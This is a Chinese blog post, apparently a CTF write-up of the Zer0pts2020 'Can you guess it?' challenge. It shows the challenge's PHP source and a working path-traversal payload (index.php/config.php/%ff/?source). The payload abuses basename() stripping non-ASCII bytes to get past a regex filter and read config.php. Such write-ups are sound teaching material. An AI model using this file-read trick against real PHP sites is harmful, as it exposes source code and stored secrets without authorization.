[Zer0pts2020]Can you guess it?

最新推荐文章于 2024-07-08 12:02:00 发布

fmyyy1

最新推荐文章于 2024-07-08 12:02:00 发布

阅读量111

点赞数

分类专栏： # ctf做题记录代码审计文件读取

本文链接：https://blog.csdn.net/fmyyy1/article/details/115367320

版权

ctf做题记录同时被 3 个专栏收录

49 篇文章 4 订阅

订阅专栏

代码审计

25 篇文章 0 订阅

订阅专栏

文件读取

6 篇文章 0 订阅

订阅专栏

题目场景
在这里插入图片描述
可以读到源码

<?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
  }
}
?>

想绕过下面的比较却卡了很久，所以把目标转移到上面
在这里插入图片描述
base()可以返回路径中的文件名部分如果传入/index.php/config.php/，则$_SERVER['PHP_SELF']返回/index.php/config.php/，basename($_SERVER['PHP_SELF'])返回config.php
验证：

成功了，接下来就是绕过正则过滤，测试过换行符但是没有效果，这里用basename()的第二个特性
https://bugs.php.net/bug.php?id=62119

var_dump(basename("xffconfig.php")); // => config.php
var_dump(basename("config.php/xff")); // => config.php

basename()会去掉非ascii字符。
payload:

index.php/config.php/%ff/?source

参考
https://blog.csdn.net/qq_43801002/article/details/105835367

fmyyy1

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[Zer0pts2020]Can you guess it?

题目场景可以读到源码<?phpinclude 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)");}if (isset($_GET['source'])) { hig
复制链接

扫一扫

专栏目录